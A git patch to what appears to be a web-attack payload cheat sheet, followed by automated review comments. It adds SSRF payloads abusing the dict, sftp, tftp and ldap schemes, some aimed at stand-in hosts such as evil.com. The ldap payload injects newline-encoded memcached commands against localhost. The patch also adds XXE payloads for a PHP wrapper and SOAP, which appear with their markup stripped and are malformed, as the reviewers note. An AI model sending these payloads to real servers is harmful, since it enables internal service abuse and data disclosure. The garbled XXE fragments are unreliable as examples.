From 9adb81e6d8b820fef8635e39df8827a9dabf6533 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 7 Aug 2017 21:42:14 +0200 Subject: [PATCH] SSRF URL Scheme + XXE Soap --- SSRF injection/README.md | 26 ++++++++++++++++++++++++ XXE injections/Files/XXE PHP Wrapper.xml | 10 +++++++++ XXE injections/README.md | 7 +++++++ 3 files changed, 43 insertions(+) create mode 100644 XXE injections/Files/XXE PHP Wrapper.xml diff --git a/SSRF injection/README.md b/SSRF injection/README.md index fd99c41..2af9a6c 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -71,7 +71,33 @@ requests + browsers : 2.2.2.2 urllib : 3.3.3.3 ``` +## SSRF via URL Scheme +Dict:// +The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: +``` +dict://;@:/d::: +ssrf.php?url=dict://attacker:11111/ +``` + +Sftp:// +``` +ssrf.php?url=sftp://evil.com:11111/ +``` + +Tftp:// +``` +ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET +``` + +Ldap:// +``` +ssrf.php?url=ldap://localhost:11211/%0astats%0aquit +``` + + ## Thanks to * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) * [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648) * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) +* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/) +* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) diff --git a/XXE injections/Files/XXE PHP Wrapper.xml b/XXE injections/Files/XXE PHP Wrapper.xml new file mode 100644 index 0000000..9581749 --- /dev/null +++ b/XXE injections/Files/XXE PHP Wrapper.xml @@ -0,0 +1,10 @@ + ]> + + + Jean &xxe; Dupont + 00 11 22 33 44 + 42 rue du CTF + 75000 + Paris + + 
diff --git a/XXE injections/README.md b/XXE injections/README.md index 9ff5a47..4213c78 100644 --- a/XXE injections/README.md +++ b/XXE injections/README.md @@ -96,6 +96,13 @@ File stored on http://92.222.81.2/dtd.xml "> ``` +XXE Inside SOAP +``` + %dtd;]>]]> +``` + + ## Thanks to * https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing * http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html +* https://gist.github.com/staaldraad/01415b990939494879b4
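Review bot: In the `SSRF injection/README.md` hunk, only the Dict:// entry explains itself; Sftp://, Tftp:// and Ldap:// are bare URLs with no sentence on what each one shows, and the Ldap:// example (`ldap://localhost:11211/%0astats%0aquit`) uses URL-encoded newlines and a port that the text never accounts for. Add a one-line description per scheme, as the Dict:// entry has, plus what a defender should take from it (for instance, that the server-side fetcher should accept only the schemes the application needs). The syntax line `dict://;@:/d:::` has every field empty, which reads as if the placeholder names were dropped; please restore them. The scheme labels are plain text placed directly under `## SSRF via URL Scheme`, so consider making them subheadings or list items, and use one placeholder host throughout rather than both `attacker` and `evil.com`.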
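Review bot: The new `XXE injections/Files/XXE PHP Wrapper.xml` begins with `]>` and references `&xxe;`, but no DOCTYPE opening or entity declaration is visible in the added lines, and the contact values (`Jean &xxe; Dupont`, `75000`, `Paris`) carry no element tags, so as shown the file is not well-formed XML. Please confirm the committed file is complete. The file is also not referenced from `XXE injections/README.md` anywhere in this patch, and the subject line ("SSRF URL Scheme + XXE Soap") does not mention it; add a README entry that names the file and says what it demonstrates.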
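Review bot: In the `XXE injections/README.md` hunk, the fenced line under "XXE Inside SOAP" reads `%dtd;]>]]>`: it uses `%dtd;` and closes with `]]>`, but neither the declaration of `dtd` nor the opening of the CDATA section or the SOAP envelope is visible, so a reader cannot tell where in the SOAP body the DOCTYPE sits. Include the full envelope with a placeholder host and one sentence on why the DOCTYPE is wrapped that way. "XXE Inside SOAP" is plain text rather than a heading, and the gist link added under "Thanks to" would be easier to audit with a title.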